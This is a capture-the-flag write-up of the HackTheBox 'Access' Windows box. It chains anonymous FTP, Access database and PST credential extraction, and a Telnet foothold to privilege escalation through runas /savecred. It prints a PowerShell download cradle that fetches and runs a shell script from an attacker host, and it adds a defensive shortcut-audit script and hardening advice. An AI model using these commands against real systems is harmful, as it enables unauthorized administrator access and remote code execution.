- OS: Windows (Server 2008 R2)
- Domain / vhosts: none
Summary
Access is an Easy-rated Windows box that teaches a clean three-stage credential chain:
anonymous FTP exposes a Microsoft Access database, the database yields a
password that unlocks a zip file containing an Outlook PST archive, and the
PST holds an email with credentials for a Telnet session. The privilege
escalation abuses Windows Credential Manager’s /savecred feature — an
administrator password was previously cached by a shortcut on the Public
Desktop, and any local user can replay it via runas /savecred to run
commands as Administrator without knowing the password.
Kill-chain: FTP anonymous → backup.mdb → mdbtools extracts password from
auth_user table → unlocks Access Control.zip → readpst reads
Access Control.pst → email reveals security account password → Telnet
foothold → cmdkey /list reveals cached Administrator credential →
runas /savecred executes a Nishang PowerShell reverse shell as
Administrator.
The box name is a double pun: the Microsoft Access database format is central to the foothold, and the theme throughout is gaining access via credentials that were left lying around in publicly-accessible locations.
Source attribution
- 0xdf, “HTB: Access” — https://0xdf.gitlab.io/2019/03/02/htb-access.html. Primary source. Covers the mdbtools enumeration, PST extraction via readpst, the cmdkey /savecred privesc, and the DPAPI alternate path.
- IppSec, “Access” video walkthrough — https://ippsec.rocks/?#Access.
Recon
nmap -sT -p- --min-rate 5000 -oA nmap/alltcp <TARGET>
nmap -sV -sC -p 21,23,80 -oA nmap/scripts <TARGET>
21/tcp open ftp Microsoft FTP Service
23/tcp open telnet Microsoft Telnet Service
80/tcp open http Microsoft IIS httpd 7.5
IIS 7.5 fingerprints Windows 7 or Server 2008 R2. No SMB on 445 — this is not a domain-joined host. FTP and Telnet are the entry vectors; HTTP is a dead end (gobuster finds nothing actionable).
FTP enumeration
FTP allows anonymous login. The server accepts EPRT (active mode)
for LIST but its PASV/EPSV reply lies (227 Entering Passive
Mode (0,0,0,0,…) — IP 0.0.0.0), and the standard Linux ftp
client refuses with “Passive mode address mismatch”, aborting binary
downloads. curl --ftp-port - forces active mode and works on both
the directory listing and the file fetches:
curl --ftp-port - -u anonymous:[email protected] 'ftp://<TARGET>/Backups/backup.mdb' -o backup.mdb
curl --ftp-port - -u anonymous:[email protected] 'ftp://<TARGET>/Engineer/Access%20Control.zip' -o 'Access Control.zip'
backup.mdb is a 5.6 MB Microsoft Access database file.
Access Control.zip is a password-protected archive.
MDB extraction — auth_user credentials
The mdbtools suite reads Microsoft Access .mdb files on Linux without
requiring a Windows host:
# List all non-empty tables (mdb-tables prints the names space-separated on one line,
# so skip the empty token that tr leaves at the end of the list)
mdb-tables backup.mdb | tr ' ' '\n' | while read t; do
  [ -n "$t" ] || continue
  [ "$(mdb-export backup.mdb "$t" | wc -l)" -gt 1 ] && echo "$t"
done
The auth_user table contains three accounts:
mdb-export backup.mdb auth_user
id,username,password,Status,...
25,"admin","admin",1,...
27,"engineer","access4u@security",1,...
28,"backup_admin","admin",1,...
The engineer account password doubles as the zip archive password.
PST extraction — Telnet credentials
Unzip with the discovered password:
7z x "Access Control.zip"
The archive contains Access Control.pst, an Outlook Personal Storage file.
Convert and read it:
readpst "Access Control.pst"
mutt -Rf "Access Control.mbox"
The mailbox contains a single email from [email protected] stating that the
password for the security account has been changed. This yields credentials
for the security Windows account.
Foothold — Telnet as security
telnet <TARGET>
# login: security password: <from email>
Welcome to Microsoft Telnet Service
C:\Users\security>whoami
access\security
user.txt is at C:\Users\security\Desktop\user.txt.
Privilege escalation — cmdkey / runas /savecred
Check cached Windows credentials:
cmdkey /list
Currently stored credentials:
Target: Domain:interactive=ACCESS\Administrator
Type: Domain Password
User: ACCESS\Administrator
The Administrator credential is cached in Windows Credential Manager.
Inspect the Public Desktop to understand how it got there:
C:\Users\Public\Desktop\ZKAccess3.5 Security System.lnk
This shortcut invokes runas.exe /user:ACCESS\Administrator /savecred "...".
When the Administrator previously used this shortcut, Windows Credential
Manager stored the password. The /savecred flag tells runas to read the
stored credential rather than prompting — and any local user can invoke it
to run commands as Administrator without knowing the password.
If you only need the flag, skip the reverse-shell entirely — runas
already executes commands as Administrator, so just have it type
the flag into a directory the security Telnet session can read:
runas /user:ACCESS\Administrator /savecred "cmd /c type C:\Users\Administrator\Desktop\root.txt > C:\Users\Public\r.txt"
type C:\Users\Public\r.txt
If you want the interactive shell, the same trick with a download cradle works (Telnet doesn’t need a TTY for the runas call):
runas /user:ACCESS\Administrator /savecred "powershell iex(new-object net.webclient).downloadstring('http://<ATTACKER>:8080/shell.ps1')"
In either case the spawned process runs as ACCESS\Administrator:
C:\Users\security>runas … "cmd /c whoami > C:\Users\Public\who.txt"
C:\Users\security>type C:\Users\Public\who.txt
access\administrator
root.txt is at C:\Users\Administrator\Desktop\root.txt.
Why each step worked
- Anonymous FTP with sensitive backups: FTP’s anonymous login mode is intended for public file distribution. Storing an internal Access database with user credentials in an FTP directory accessible to anonymous is equivalent to publishing those credentials publicly.
- Microsoft Access .mdb readable cross-platform: the .mdb file format is an OLE Compound Document. The open-source mdbtools library implements the format spec and can dump any table without needing Microsoft Access or a Windows host. There is no access control beyond the file itself.
- Password reuse, database → zip archive: the engineer password from the database was reused as the zip archive password. The two artifacts were left in different FTP directories, but once the database credential was extracted, the archive opened trivially.
- PST as a credential store: .pst files are Outlook mailbox archives. readpst (part of libpst) converts them to standard mbox format readable by mutt or any mail client. Emails routinely contain credentials sent in plaintext (“the new password is…”); a PST left on an accessible share is a credential dump.
- Windows Credential Manager + /savecred: runas /savecred tells Windows to check the Credential Manager vault for a cached password and use it without prompting. This is designed for convenience (e.g., a kiosk that needs to run admin tasks without exposing the password). However, once the credential is cached, any process running as any local user can invoke runas /savecred /user:Administrator <cmd> and Windows will supply the cached password automatically. The stored credential is tied to the user profile on disk — it is not protected by the calling user’s identity.
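The shortcut on the Public Desktop is the artefact a defender can hunt for. The following audit script is an added example, not code from the writeup or from 0xdf/IppSec: it parses the StringData section of a .lnk file using the public MS-SHLLINK layout and flags any shortcut whose arguments invoke runas with /savecred, reporting the /user: it targets. The sample shortcut bytes are constructed inline and "<program>" is a placeholder for the real target path, which the writeup elides.

```python
import re
import struct

# MS-SHLLINK LinkFlags bits (public format spec); StringData fields appear in this order.
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_DATA = (("NAME", 0x04), ("RELATIVE_PATH", 0x08), ("WORKING_DIR", 0x10),
               ("ARGUMENTS", 0x20), ("ICON_LOCATION", 0x40))

def lnk_strings(data: bytes) -> dict:
    """Parse the StringData section of a .lnk file into {field_name: text}."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 0x4C                                   # end of the fixed ShellLinkHeader
    if flags & HAS_ID_LIST:                      # skip IDListSize + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize counts the whole block
        pos += struct.unpack_from("<I", data, pos)[0]
    width = 2 if flags & IS_UNICODE else 1
    fields = {}
    for name, bit in STRING_DATA:
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters
            raw = data[pos + 2:pos + 2 + count * width]
            fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252", "replace")
            pos += 2 + count * width
    return fields

def audit_lnk(name: str, data: bytes):
    """Return a finding when a shortcut's arguments invoke runas with /savecred."""
    args = lnk_strings(data).get("ARGUMENTS", "")
    if "/savecred" not in args.lower():
        return None
    user = re.search(r"/user:(\S+)", args, re.I)
    return {"file": name, "user": user.group(1) if user else None, "args": args}

def build_lnk(arguments: str) -> bytes:
    """Constructed minimal .lnk (header + ARGUMENTS only) so the audit can be tested offline."""
    clsid = bytes.fromhex("0114020000000000c000000000000046")        # LinkCLSID
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, clsid, 0x20 | IS_UNICODE,
                         0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    return header + struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")

# Constructed samples modelled on the writeup's shortcut; "<program>" stands in for the target.
SAMPLES = {"ZKAccess3.5 Security System.lnk":
               build_lnk(r'/user:ACCESS\Administrator /savecred "<program>"'),
           "Calculator.lnk": build_lnk("")}
FINDINGS = [f for n, d in SAMPLES.items() if (f := audit_lnk(n, d))]
```

On a real host, run audit_lnk over the bytes of every *.lnk under C:\Users\Public\Desktop (and other shared profile folders) and cross-check each finding's user against the Target lines of cmdkey /list to confirm the cache is populated.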
Counterfactuals
- Disable anonymous FTP or place backups behind authentication. Sensitive database files should never be accessible to unauthenticated FTP clients.
- Rotate all credentials extracted from backup.mdb immediately upon decommissioning that backup. Don’t reuse backup credentials elsewhere.
- Never store credentials in email in plaintext. Use a password manager or encrypted channel for credential distribution.
- Avoid /savecred for privileged accounts in multi-user environments. If automation requires unattended privileged execution, use a dedicated service account with minimum necessary rights, not the Administrator account.
- Disable Telnet in favour of WinRM or RDP with NLA. Telnet transmits all data (including passwords) in plaintext.
Key Takeaways
- FTP anonymous login is a reconnaissance priority: any directory listing visible to anonymous is effectively public.
- Tools like mdbtools, readpst, and 7z allow complete offline analysis of Windows-format files on Linux — no Windows host required.
- mdbtools for .mdb files: mdb-tables lists tables; mdb-export dumps table contents as CSV. A credential table in an Access database is identical to a credential dump — treat it the same way.
- PST files contain emails, which contain credentials: whenever a PST or .ost file is found, convert it and search for password-containing messages before moving on.
- cmdkey /list is the first thing to run on a Windows foothold: if Administrator credentials are cached, runas /savecred is an immediate privesc with no brute force. The presence of a .lnk shortcut using /savecred on a shared Desktop is the signal that the cache was populated.
- runas /savecred works from non-interactive shells (Telnet, webshells): unlike runas with a password prompt, /savecred reads from the vault and requires no TTY. Pair it with a download cradle to avoid writing a payload to disk unnecessarily.
References
- 0xdf, “HTB: Access” — https://0xdf.gitlab.io/2019/03/02/htb-access.html
- IppSec, “Access” — https://ippsec.rocks/?#Access
- mdbtools — https://github.com/mdbtools/mdbtools
- libpst / readpst — PST file conversion utility